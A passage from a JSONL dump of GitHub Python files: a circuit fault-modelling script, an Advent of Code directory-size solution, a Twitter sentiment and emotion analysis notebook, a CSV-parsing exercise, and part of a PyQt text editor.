vectors_re = re.compile(r'^Vectors: (\\S+)', re.IGNORECASE)\n\n f = open(filename, \"r\")\n circuit = None\n vectors = []\n assertions = []\n truthtable = None\n inside_truthtable = False\n lines_left = 0\n for line in f:\n match = scheme_re.search(line)\n if match and not inside_truthtable:\n lines_count, inputs, outputs, asserts = int(match.group(1)), match.group(2), match.group(3), match.group(4)\n input_lines = [int(x) for x in inputs.split(\",\")]\n output_lines = [int(x) for x in outputs.split(\",\")]\n assert_lines = [int(x) for x in asserts.split(\",\")]\n\n circuit = modeling.Circuit(lines_count, input_lines, output_lines, assert_lines)\n continue\n\n match = element_re.search(line)\n if match and not inside_truthtable:\n element_name, truthtable_name, inputs, outputs = [match.group(i + 1) for i in range(4)]\n truthtable = circuit.truthtable_storage[truthtable_name]\n input_lines = [int(x) for x in inputs.split(\",\")]\n output_lines = [int(x) for x in outputs.split(\",\")]\n element = modeling.Element(element_name, truthtable, input_lines, output_lines, circuit)\n circuit.elements[element_name] = element\n continue\n\n match = vectors_re.search(line)\n if match and not inside_truthtable:\n vectors_str = match.group(1)\n vectors_str_list = vectors_str.split(\";\")\n vectors = [[modeling.logic_value_from_str(c) for c in s.split(\",\")[0]] for s in vectors_str_list]\n assertions = [[modeling.logic_value_from_str(c) for c in s.split(\",\")[1]] for s in vectors_str_list]\n continue\n\n match = truthtable_header_re.search(line)\n if match and not inside_truthtable:\n name = match.group(1)\n inputs, outputs, lines = [int(match.group(i + 2)) for i in range(3)]\n truthtable = modeling.Truthtable(name, inputs, outputs)\n lines_left = lines\n inside_truthtable = True\n continue\n\n match = truthtable_line_re.search(line)\n if match and inside_truthtable:\n input_terms_str, output_terms_str = match.group(1), match.group(2)\n input_terms = [modeling.logic_value_from_str(s) for s in input_terms_str]\n output_terms = [modeling.logic_value_from_str(s) for s in output_terms_str]\n truthtable += modeling.TruthtableLine(input_terms, output_terms)\n lines_left -= 1\n if lines_left == 0:\n inside_truthtable = False\n circuit.truthtable_storage[truthtable.name] = truthtable\n continue\n\n f.close()\n return circuit, vectors, assertions\n\n\ndef print_faults(f, tests, assertions_lines_count, assertions, faults, assertion_lines_avail,\n activation_matrix, func_matrix, result_faults):\n print(\"Faults table\", file=f)\n for test in range(tests):\n out1 = \"\".join([modeling.fault_modeling_value_to_str(value) for value in faults[test]])\n out2 = \"\".join([modeling.logic_value_to_str(value) for value in assertions[test]])\n out = \" \".join([out1, out2])\n print(out, file=f)\n\n print(\"Assertion lines\", file=f)\n for i in range(assertions_lines_count):\n out = \"\".join([modeling.logic_value_to_str(value) for value in assertion_lines_avail[i]])\n print(out, file=f)\n\n print(\"Activation matrix\", file=f)\n for i in range(tests):\n out = \"\".join([modeling.logic_value_to_str(value) for value in activation_matrix[i]])\n print(out, file=f)\n\n print(\"Functional matrix\", file=f)\n for i in range(tests):\n out = \"\".join([modeling.fault_modeling_value_to_str(value) for value in func_matrix[i]])\n print(out, file=f)\n\n print(\"Detected faults\", file=f)\n out = \", \".join(['{}-{}'.format(fault[0], modeling.fault_modeling_value_to_str(fault[1]))\n for fault in result_faults])\n print(out, file=f)\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Modeling of circuits\")\n parser.add_argument(\"-i\", \"--input\", metavar=\"inputfile\", type=str, help=\"Input file name\")\n parser.add_argument(\"-o\", \"--output\", metavar=\"outputfile\", type=str, help=\"Output file name\")\n args = parser.parse_args()\n input_filename = args.input\n output_filename = args.output\n\n circuit, vectors, assertions = read_input_data(input_filename)\n circuit.prepare()\n\n try:\n f = open(output_filename, \"w\")\n faults, assertion_lines_avail, activation_matrix, func_matrix, result_faults =\\\n circuit.modeling_faults(vectors, assertions)\n print_faults(f, len(vectors), len(circuit.assert_lines), assertions, faults,\n assertion_lines_avail, activation_matrix, func_matrix, result_faults)\n f.close()\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n main()\nelse:\n print(\"This module shouldn't be imported!\")\n","repo_name":"vlukyanets/quantum-calculations","sub_path":"lab3/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41512326396","text":"import time\nimport os\nfrom typing import List\n\nUSE_LOGGING = False\nUSE_DEMO = False\nPART_ONE = False\n\nclass MyFile:\n def __init__(self, size: int, name: str):\n self.Size = size\n self.Name = name\n\n def print(self):\n print()\n\nclass MyDirectory:\n def __init__(self, name: str, parent):\n self.Name = name\n self.Parent: MyDirectory = parent\n self.Children: List[MyDirectory] = []\n self.Files: List[MyFile] = []\n self.Depth = 0 if parent is None else parent.Depth + 1\n self.Size = 0\n\n def print(self):\n print(\"% s% s - % s\" % ((\"\\t\"*self.Depth),self.Name,self.Size))\n for f in self.Files: print(\"% s% s - % s\" % ((\"\\t\"*(self.Depth+1)),f.Name, f.Size))\n for c in self.Children: c.print()\n\n def calcSize(self):\n for child in self.Children: child.calcSize()\n self.Size = sum(f.Size for f in self.Files) + sum(d.Size for d in self.Children)\n\nROOT = MyDirectory(\"/\", None)\n\ndef getInput(fileName):\n file = open(fileName, 'r')\n input = [x.strip().split(\" \") for x in file.readlines()]\n\n if USE_LOGGING: print(input)\n\n return input\n\ndef readTerminal(terminal):\n currentDirectory = ROOT\n \n for line in terminal: \n if line[0] == \"$\":\n if USE_LOGGING: print(\"Command\")\n\n if line[1] == \"cd\":\n if line[2] == \"/\":\n if USE_LOGGING: print(\"\\tChange Directory to Root\")\n currentDirectory = ROOT #redundant so far, but better to be complete\n elif line[2] == \"..\":\n if USE_LOGGING: print(\"\\tChange Directory to Parent\")\n\n if currentDirectory.Parent is None: raise Exception(\"Can't cd to parent, there isn't one. Current Directory is \", currentDirectory.Name)\n else: currentDirectory = currentDirectory.Parent\n else:\n if USE_LOGGING: print(\"\\tChange Directory to \", line[2])\n childDirectory = next(filter(lambda d: d.Name == line[2], currentDirectory.Children), None)\n\n if childDirectory is None: raise Exception(\"Can't cd to child, it wasn't found. Current Directory is \", currentDirectory.Name)\n else: currentDirectory = childDirectory\n\n elif line[1] == \"ls\":\n if USE_LOGGING: print(\"\\tls\")\n #I don't think I actually need to do anything with this\n\n elif line[0] == \"dir\":\n if USE_LOGGING: print(\"Directory \", line[1])\n currentDirectory.Children.append(MyDirectory(line[1], currentDirectory))\n else: #file\n if USE_LOGGING: print(\"File % s (% s)\" % (line[1], line[0]))\n currentDirectory.Files.append(MyFile(int(line[0]), line[1]))\n\ndef getSmallDirSum(myDirectory: MyDirectory, targetSize: int):\n sum = myDirectory.Size if myDirectory.Size <= targetSize else 0\n\n for child in myDirectory.Children:\n sum += getSmallDirSum(child, targetSize)\n\n return sum\n\ndef getSmallestDeleteCandidate(myDirectory: MyDirectory, targetSize: int):\n smallestOption = myDirectory.Size if myDirectory.Size > targetSize else 0\n\n for child in myDirectory.Children:\n smallestChild = getSmallestDeleteCandidate(child, targetSize)\n if smallestChild > 0 and smallestChild < smallestOption: smallestOption = smallestChild\n\n return smallestOption\n\n\n#start of main\nsolution = 0\ntotalSize = 70000000\nunusedSpaceTarget = 30000000\n\nstartTime = time.time()\n\nfile = 'example.txt' if USE_DEMO else 'input1.txt'\n\nterminal = getInput(file)\nreadTerminal(terminal)\nROOT.calcSize()\nif USE_LOGGING: ROOT.print()\n\nfreeSpace = totalSize - ROOT.Size\n\nsolution = getSmallDirSum(ROOT, 100000) if PART_ONE else getSmallestDeleteCandidate(ROOT, unusedSpaceTarget - freeSpace)\n\nendtime = time.time()\nprint('Solution: ', solution)\nprint ('Completion time: ', endtime - startTime)","repo_name":"TheoreticalHybrid/AdventOfCode","sub_path":"2022/Day_07/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29445731675","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[41]:\n\n\n# Importing necessary libraries\n\n# For data manipulation\nimport re\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport glob\n\n# For EDA and visualization\nimport seaborn as sns\nsns.set(rc={'figure.figsize': (20,10)})\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nimport plotly.figure_factory as ff\n\n\n# For pre-processing text\nimport nltk\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom better_profanity import profanity\nprofanity.load_censor_words()\n\n# For other output and NLP utilities\nfrom bokeh.plotting import figure\nfrom bokeh.io import output_file, show, output_notebook\nfrom collections import Counter\nimport spacy\nfrom spacy.util import compounding\nfrom spacy.util import minibatch\nfrom spacy import displacy\nimport gc\nimport os\nimport urllib\nimport csv\nfrom tqdm import tqdm\n\n# For modelling and sentiment analysis\nfrom sklearn.svm import LinearSVC\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nimport torch\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\nfrom scipy.special import softmax\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import confusion_matrix, classification_report\n\n\n# # Data preparation\n\n# ## Dataset initialization\n# \n# #### Note: the total dataset size is 17 GB and cannot be processed without a GPU so for the sake of demonstration, we will use a subset of the data\n\n# In[2]:\n\n\n# Loading all CSV files from the data/ folder\nl = [pd.read_csv(filename, index_col=0, compression='gzip', low_memory=False) for filename in glob.glob(\"../data/input/*.gzip\")]\n\n# Combining all CSV files into a single dataframe\ndf = pd.concat(l, axis=0)\n\n\n# In[3]:\n\n\ndf.head()\n\n\n# ## Data cleaning\n\n# In[4]:\n\n\ndf.shape\n\n\n# In[5]:\n\n\n# Checking column datatypes\ndf.info()\n\n\n# In[6]:\n\n\n# Checking for empty values\ndf.isna().sum().sort_values(ascending=False)\n\n\n# In[7]:\n\n\n# Removing profanity from tweet texts\n# df['text'] = df['text'].apply(lambda x: profanity.censor(x))\n\n\n# #### Since one of the steps in our EDA process is to check tweets by location, we need to handle empty location values\n\n# In[8]:\n\n\n# Handling NaN values for location\ndf = df.dropna(subset=['location'])\n\n\n# # EDA\n\n# ### Tweets by language\n\n# In[9]:\n\n\n# Getting top 5 languages for tweets\ndf.language.value_counts()[:5]\n\n\n# In[10]:\n\n\n# Plotting barplot for visualization\nfig = sns.barplot(x=df.language.value_counts()[:5].index, y=df.language.value_counts()[:5])\nfig.set(title='Tweets by langauge', xlabel='Language', ylabel='Tweet count (order of 10)')\nfig = fig.get_figure()\n\n# Saving barplot to file\nfig.savefig('../static/tweets_by_language.png', bbox_inches='tight')\n\n\n# #### For sentiment analysis, we will only be using tweets in English\n\n# In[11]:\n\n\n# Extracting all tweets in English language\ndf_en = df[df.language == 'en'].drop('language', axis=1)\n\n\n# #### We will sort the tweets based on retweet count to judge for popularity\n\n# In[12]:\n\n\n# Sorting tweets based on retweet count\nsorted_tweets = df_en[['username', 'text', 'retweetcount', 'tweetid']].sort_values(by='retweetcount', ascending=False).reset_index()\n\n# Getting top 10 most retweeted tweets\nsorted_tweets[['username', 'text']].head(10)\n\n\n# ### Conversation topics and most used words\n\n# In[13]:\n\n\n# Building stopwords set\nstopwords_set = set(STOPWORDS)\nstopwords_set = set(stopwords.words('english'))\n\n\n# In[14]:\n\n\n# Generating word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords=stopwords_set,\n max_words=300,\n max_font_size=40,\n scale=2,\n random_state=42)\nwordcloud.generate(str(df_en['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/top_conversation_topics_wordcloud.png')\nplt.show()\n\n\n# #### Since a few tweets were retweeted too many times, it seems like a better idea to build a word cloud from only unique tweets\n\n# In[15]:\n\n\n# Getting unique tweets\nunique_tweets = df_en.drop_duplicates(subset=['text'])\n\n# Building word cloud\nwordcloud= WordCloud(background_color='white',\n stopwords=stopwords_set,\n max_words=300,\n max_font_size=40,\n scale=2,\n random_state=42\n ).generate(str(unique_tweets.sort_values(by='retweetcount').iloc[:20]['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/top_unique_conversation_topics_wordcloud.png')\nplt.show()\n\n\n# ### Tweets by location\n\n# In[16]:\n\n\n# Plotting barplot for visualization\nfig = df_en.location.value_counts()[:10].plot.bar()\nfig.set(title='Tweets by location', xlabel='Location', ylabel='Location count')\nfig = fig.get_figure()\n\n# Saving barplot to file\nfig.savefig('../static/tweets_by_location.png', bbox_inches='tight')\n\n\n# ### One of the points discussed during the project proposal was to check for tweets by new accounts and check for possible propaganda\n\n# #### Let's extract tweets by newest accounts and check how the wordcloud changes\n\n# In[17]:\n\n\ntime_cols = ['extractedts', 'tweetcreatedts', 'usercreatedts']\n\n# Converting \"user account created time\" column to datetime\ndf_en['usercreatedts'] = pd.to_datetime(df_en['usercreatedts'])\n\n# Sorting by youngest user account age\nsort_by_userage= df_en.sort_values(by='usercreatedts', ascending=True)\n\n\n# In[18]:\n\n\n# Getting columns\ncolumns = df_en.columns.to_list()\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords=stopwords_set,\n max_words=300,\n max_font_size=40,\n scale=2,\n random_state=42\n ).generate(str(sort_by_userage.iloc[:1000, columns.index('text')]))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/newest_accounts_conversation_topics_wordcloud.png')\nplt.show()\n\n\n# # Sentiment analysis\n# \n\n# #### Note: due to computation limitations, we will be using only the first 10000 rows for demonstration purposes\n\n# In[123]:\n\n\n# Building dataframe for sentiment analysis\nsentiment_df = df_en[['text']].iloc[:10000]\n\nsentiment_df.head()\n\n\n# ### We will be using RoBERTa for sentiment analysis\n# #### Note: we will be using the CPU as our local machine does not have an NVIDIA GPU\n\n# In[124]:\n\n\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n\n\n# In[125]:\n\n\n# Initializing tokenizer\ntokenizer = AutoTokenizer.from_pretrained('cardiffnlp/twitter-roberta-base-sentiment')\n\n# Initializing model\nmodel = AutoModelForSequenceClassification.from_pretrained('cardiffnlp/twitter-roberta-base-sentiment').to(device)\n\n# Assigning sentiment labels\nlabels = ['negative', 'neutral', 'positive']\n\n\n# In[126]:\n\n\n# Setting batch size\nBATCH_SIZE = 10\n\n# Getting sentiment scores for tweet texts\nscores_all = np.empty((0, len(labels)))\ntext_all = sentiment_df['text'].to_list()\nn = len(text_all)\nwith torch.no_grad():\n for start_idx in tqdm(range(0, n, BATCH_SIZE)):\n end_idx = min(start_idx + BATCH_SIZE, n)\n encoded_input = tokenizer(text_all[start_idx:end_idx], return_tensors='pt', padding=True, truncation=True).to(device)\n output = model(**encoded_input)\n scores = output[0].detach().cpu().numpy()\n scores = softmax(scores, axis=1)\n scores_all = np.concatenate((scores_all, scores), axis=0)\n del encoded_input, output, scores\n torch.cuda.empty_cache()\n\n# Saving scores to sentiment dataframe\nsentiment_df['negative'] = [i[0] for i in scores_all]\nsentiment_df['neutral'] = [i[1] for i in scores_all]\nsentiment_df['positive'] = [i[2] for i in scores_all]\n\n\n# In[127]:\n\n\nsentiment_df.head()\n\n\n# # Emotion detection\n\n# In[128]:\n\n\n# Initializing tokenizer\nemotion_tokenizer = AutoTokenizer.from_pretrained(\"cardiffnlp/twitter-roberta-base-emotion\")\n\n# Initializing model\nemotion_model = AutoModelForSequenceClassification.from_pretrained(\"cardiffnlp/twitter-roberta-base-emotion\").to(device)\n\n# Assigning sentiment labels\nlabels = ['anger', 'joy', 'optimism', 'sadness']\n\n\n# In[129]:\n\n\n# Setting batch size\nBATCH_SIZE = 10\n\n# Getting emotion scores for tweet texts\nscores_all = np.empty((0, len(labels)))\ntext_all = sentiment_df['text'].to_list()\nn = len(text_all)\nwith torch.no_grad():\n for start_idx in tqdm(range(0, n, BATCH_SIZE)):\n end_idx = min(start_idx + BATCH_SIZE, n)\n encoded_input = tokenizer(text_all[start_idx:end_idx], return_tensors='pt', padding=True, truncation=True).to(device)\n output = emotion_model(**encoded_input)\n scores = output[0].detach().cpu().numpy()\n scores = softmax(scores, axis=1)\n scores_all = np.concatenate((scores_all, scores), axis=0)\n del encoded_input, output, scores\n torch.cuda.empty_cache()\n \n\n# Saving scores to sentiment dataframe\nsentiment_df['anger'] = [i[0] for i in scores_all]\nsentiment_df['joy'] = [i[1] for i in scores_all]\nsentiment_df['optimism'] = [i[2] for i in scores_all]\nsentiment_df['sadness'] = [i[3] for i in scores_all]\n\n\n# In[130]:\n\n\nsentiment_df.head()\n\n\n# In[131]:\n\n\n# Saving all scores as a dataset\nsentiment_df.to_csv(\"../data/output/roberta_scores.csv\", index=False)\n\n\n# # Sentiment and emotion analysis \n\n# ## Sentiment analysis\n\n# In[132]:\n\n\n# Reading previously generated RoBERTa scores\ntweet_df = pd.read_csv(\"../data/output/roberta_scores.csv\", lineterminator='\\n')\n\ntweet_df.head()\n\n\n# In[133]:\n\n\n# Adding a sentiment column to save overall sentiment\ntweet_df.insert(4, \"sentiment\", '')\n\ntweet_df.head(0)\n\n\n# In[134]:\n\n\n# Computing overall sentiment for each tweet\nfor i in range(len(tweet_df)):\n if tweet_df['negative'][i] > tweet_df['positive'][i] and tweet_df['negative'][i] > tweet_df['neutral'][i]:\n tweet_df['sentiment'][i] = 'negative'\n elif tweet_df['positive'][i] > tweet_df['negative'][i] and tweet_df['positive'][i] > tweet_df['neutral'][i]:\n tweet_df['sentiment'][i]= 'positive'\n else:\n tweet_df['sentiment'][i] = 'neutral'\n\ntweet_df.head()\n\n\n# In[135]:\n\n\n# Removing +ve, -ve, neutral columns as we don't need them anymore\ntweet_df.drop(['negative','positive','neutral'], axis=1, inplace=True)\n\n\n# In[136]:\n\n\n# Saving overall sentiments as a dataset\ntweet_df.to_csv(\"../data/output/roberta_overall_sentiment.csv\", index=False)\n\n\n# ### Plot for overall sentiment of tweets\n\n# In[137]:\n\n\n# Plotting barplot for visualization\nplt.figure(figsize = (8,7))\nfig = sns.countplot(x=\"sentiment\", data=tweet_df, palette='magma')\nfig = fig.get_figure()\n\n# Saving barplot to file\nfig.savefig('../static/overall_tweet_sentiment.png', bbox_inches='tight')\n\n\n# ### Word cloud for negative, neutral and positive sentiments\n\n# In[139]:\n\n\ntweet_neg = tweet_df.loc[tweet_df['sentiment']=='negative'].reset_index(drop=True)\ntweet_net = tweet_df.loc[tweet_df['sentiment']=='neutral'].reset_index(drop=True)\ntweet_pos = tweet_df.loc[tweet_df['sentiment']=='positive'].reset_index(drop=True)\n\n\n# #### Negative sentiment word cloud\n\n# In[140]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords = stopwords_set,\n max_words = 300,\n max_font_size = 40,\n scale = 2,\n random_state=42\n ).generate(str(tweet_neg['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/negative_sentiment_wordcloud.png')\nplt.show()\n\n\n# #### Neutral sentiment word cloud\n\n# In[141]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords = stopwords_set,\n max_words = 300,\n max_font_size = 40,\n scale = 2,\n random_state=42\n ).generate(str(tweet_net['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/neutral_sentiment_wordcloud.png')\nplt.show()\n\n\n# #### Positive sentiment word cloud\n\n# In[142]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords = stopwords_set,\n max_words = 300,\n max_font_size = 40,\n scale = 2,\n random_state=42\n ).generate(str(tweet_pos['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/positive_sentiment_wordcloud.png')\nplt.show()\n\n\n# ## Emotion analysis\n\n# In[172]:\n\n\n# Reading previously generated RoBERTa scores\nemotion_df = pd.read_csv(\"../data/output/roberta_scores.csv\", lineterminator='\\n')\n\nemotion_df.head()\n\n\n# In[173]:\n\n\n# Removing +ve, -ve, neutral columns as we don't need them anymore\nemotion_df.drop(['negative', 'positive', 'neutral'], axis=1, inplace=True)\n\n# Adding a sentiment column to save overall sentiment\nemotion_df.insert(5, \"emotion\", '')\n\nemotion_df.head(0)\n\n\n# In[174]:\n\n\n# Computing overall emotion for each tweet\nfor i in range(len(emotion_df)):\n if emotion_df['anger'][i] > emotion_df['joy'][i] and emotion_df['anger'][i] > emotion_df['optimism'][i] and emotion_df['anger'][i] > emotion_df['sadness'][i]:\n emotion_df['emotion'][i] = 'anger'\n elif emotion_df['joy'][i] > emotion_df['anger'][i] and emotion_df['joy'][i] > emotion_df['optimism'][i] and emotion_df['joy'][i] > emotion_df['sadness'][i]:\n emotion_df['emotion'][i]= 'joy'\n elif emotion_df['optimism'][i] > emotion_df['anger'][i] and emotion_df['optimism'][i] > emotion_df['joy'][i] and emotion_df['optimism'][i] > emotion_df['sadness'][i]:\n emotion_df['emotion'][i]= 'optimism'\n else:\n emotion_df['emotion'][i] = 'sadness'\n\nemotion_df.head(10)\n\n\n# In[175]:\n\n\n# Removing +anger, joy, optimism, sadness columns as we don't need them anymore\nemotion_df.drop(['anger','joy','optimism','sadness'], axis=1, inplace=True)\n\n\n# In[176]:\n\n\n# Saving overall emotions as a dataset\nemotion_df.to_csv(\"../data/output/roberta_overall_emotion.csv\", index=False)\n\n\n# ### Plot for overall emotion of tweets\n\n# In[177]:\n\n\n# Plotting barplot for visualization\nplt.figure(figsize = (8,7))\nfig = sns.countplot(x=\"emotion\", data=emotion_df, palette='magma')\nfig = fig.get_figure()\n\n# Saving barplot to file\nfig.savefig('../static/overall_tweet_emotion.png', bbox_inches='tight')\n\n\n# ### Word cloud for anger, joy, optimism and sadness emotions\n\n# In[178]:\n\n\nemotion_anger = emotion_df.loc[emotion_df['emotion']=='anger'].reset_index(drop=True)\nemotion_joy = emotion_df.loc[emotion_df['emotion']=='joy'].reset_index(drop=True)\nemotion_opt = emotion_df.loc[emotion_df['emotion']=='optimism'].reset_index(drop=True)\nemotion_sad = emotion_df.loc[emotion_df['emotion']=='sadness'].reset_index(drop=True)\n\n\n# #### Anger emotion word cloud\n\n# In[179]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords = stopwords_set,\n max_words = 300,\n max_font_size = 40,\n scale = 2,\n random_state=42\n ).generate(str(emotion_anger['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/anger_emotion_wordcloud.png')\nplt.show()\n\n\n# #### Joy emotion word cloud\n\n# In[180]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords = stopwords_set,\n max_words = 300,\n max_font_size = 40,\n scale = 2,\n random_state=42\n ).generate(str(emotion_joy['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/joy_emotion_wordcloud.png')\nplt.show()\n\n\n# #### Optimism emotion word cloud\n\n# In[181]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords = stopwords_set,\n max_words = 300,\n max_font_size = 40,\n scale = 2,\n random_state=42\n ).generate(str(emotion_opt['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/optimism_emotion_wordcloud.png')\nplt.show()\n\n\n# #### Sadness emotion word cloud\n\n# In[182]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords = stopwords_set,\n max_words = 300,\n max_font_size = 40,\n scale = 2,\n random_state=42\n ).generate(str(emotion_sad['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/sadness_emotion_wordcloud.png')\nplt.show()\n\n","repo_name":"niharjoshi/TwitterTalk","sub_path":"src/sentiment_emotion_analysis.py","file_name":"sentiment_emotion_analysis.py","file_ext":"py","file_size_in_byte":17393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33556909714","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 20 16:36:16 2019\n\n@author: gaura\n\"\"\"\n\nDATADIR = \"\"\nDATAFILE = \"beatles-diskography.csv\"\n\n\ndef parse_file(datafile):\n data = []\n keys = []\n row = []\n data_point = {}\n i = 0\n \n with open(datafile, \"r\") as f:\n for line in f:\n j = 0\n data_point = {}\n line = line.strip()\n if i == 0:\n keys = line.split(\",\")\n if i > 10:\n continue\n if i >= 1:\n row = line.split(\",\")\n for key in keys:\n data_point[key] = row[j]\n j += 1\n data.insert(len(data),data_point)\n \n \n i += 1\n print (data)\n return (data)\n\n\ndef test():\n # a simple test of your implemetation\n datafile = os.path.join(DATADIR, DATAFILE)\n d = parse_file(datafile)\n firstline = {'Title': 'Please Please Me', 'UK Chart Position': '1', 'Label': 'Parlophone(UK)', 'Released': '22 March 1963', 'US Chart Position': '-', 'RIAA Certification': 'Platinum', 'BPI Certification': 'Gold'}\n tenthline = {'Title': '', 'UK Chart Position': '1', 'Label': 'Parlophone(UK)', 'Released': '10 July 1964', 'US Chart Position': '-', 'RIAA Certification': '', 'BPI Certification': 'Gold'}\n\n assert d[0] == firstline\n assert d[9] == tenthline\n\n \ntest()\n","repo_name":"gaurav-raii/Data-Extraction-and-parsing-from-Different-Formats-Web_APIs--xml--json-csv--xls--xlsx-","sub_path":"Extracting_and_Parsing_data_from_CSV.py","file_name":"Extracting_and_Parsing_data_from_CSV.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70549277651","text":"# -*- coding: utf-8 -*-\n\nimport json\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog, QMessageBox, QColorDialog, QPushButton, QAction, QComboBox\nfrom PyQt5.QtGui import QFont, QPainter, QColor, QTextCursor, QIcon, QPalette\nimport sys\nimport os\nfrom interfaz.interfaz import Ui_MainWindow as text_ui\nimport io\nimport functions.about\nfrom ext import find\n\n\nclass EditorWindow(QMainWindow, text_ui):\n def __init__(self, parent = None, file = None):\n super(EditorWindow, self).__init__(parent)\n self.setupUi(self)\n self.doubleSpinBox.setValue(12)\n # self.fontComboBox.setWritingSystem()\n\n # backColor = QAction(QIcon(\"icons/backcolor.png\"),\"Change background color\",self)\n\n self.actionNew.triggered.connect(lambda: self.NewFile(existing=True))\n # self.actionNew.triggered.connect(lambda: NewFile(self, self.titleTemplate, existing=True))\n self.actionOpen.triggered.connect(lambda: self.OpenFile(None))\n # self.actionOpen.triggered.connect(lambda: OpenFile(self, None))\n self.actionSave.triggered.connect(self.Save)\n # self.actionSave.triggered.connect(lambda: Save(self))\n self.actionExit.triggered.connect(lambda: sys.exit() if self.Exit() is 2 or self.Exit is 0 else None)\n self.actionSave_as.triggered.connect(self.Save_as)\n # self.actionSave_as.triggered.connect(lambda: Save_as(self))\n self.actionAcerca_de.triggered.connect(functions.about.about)\n self.actionAbout_QT.triggered.connect(functions.about.about_qt)\n self.actionText_Colour.triggered.connect(lambda: self.change_text_colour(\"Text\"))\n self.actionbackground_color.triggered.connect(lambda: self.change_text_colour(\"Background\"))\n \n self.actionBold.triggered.connect(lambda: self.text_format(\"Bold\"))\n self.actionItalic.triggered.connect(lambda: self.text_format(\"Italic\"))\n self.actionUnderline.triggered.connect(lambda: self.text_format(\"Underline\"))\n\n ### NEW ###\n #self.findAction.triggered.connect(lambda: find.Find(self).show)\n self.findAction.triggered.connect(find.Find(self).show)\n ### ###\n\n self.actionCopy.triggered.connect(lambda: self.textEdit.copy())\n self.actionPaste.triggered.connect(lambda: self.textEdit.paste() if self.textEdit.canPaste() else None)\n self.actionCut.triggered.connect(lambda: self.textEdit.cut())\n\n self.textEdit.setUndoRedoEnabled(True)\n\n self.textEdit.textChanged.connect(lambda: self.setWindowModified(True))\n\n self.textEdit.cursorPositionChanged.connect(self.UpdateLineCol)\n #self.textEdit.cursorPositionChanged.connect(self.updateFont)\n self.fontComboBox.currentFontChanged.connect(self.updateFont)\n self.doubleSpinBox.valueChanged.connect(self.updateFont)\n\n # self.textEdit.cursorPositionChanged.connect(self.autosave)\n\n self.statusbar.showMessage(\"Ln 1, Col 1\")\n self.fontComboBox.setEditable(False)\n\n self.toolBar.addWidget(self.fontComboBox)\n self.toolBar.addWidget(self.doubleSpinBox)\n # self.toolBar.addAction(backColor)\n\n self.titleTemplate = \"[*]\"\n self.filename = file\n\n self.actionCambiar_Fondo.triggered.connect(self.Backgroud_Color)\n\n\n if file is not None and not os.path.exists(self.filename):\n self.filename = None\n \n if self.filename is None:\n self.NewFile()\n else:\n self.OpenFile(self.filename)\n self._baseFile = os.path.basename(self.filename)\n\n print(self.windowTitle())\n '''\n def ffind(self):\n self.textEdit.textCursor().beginEditBlock()\n doc = self.textEdit.document()\n cursor = QTextCursor(doc)\n while True:\n cursor = doc.find(word, cursor)\n if cursor.isNull():\n break\n if replace and newWord is not None:\n cursor.insertText(newWord)\n\n self.textEdit.textCursor().endEditBlock()\n '''\n\n def autosave(self): # no sirve aun pero no rompe nada, si pueden moverle que chido\n import time\n\n print(\"autosave\")\n\n time1 = time.time()\n while time.time() - time1 < 5:\n print (time.time())\n if self.textEdit.textChanged:\n return \n \n self.Save()\n return\n\n\n def 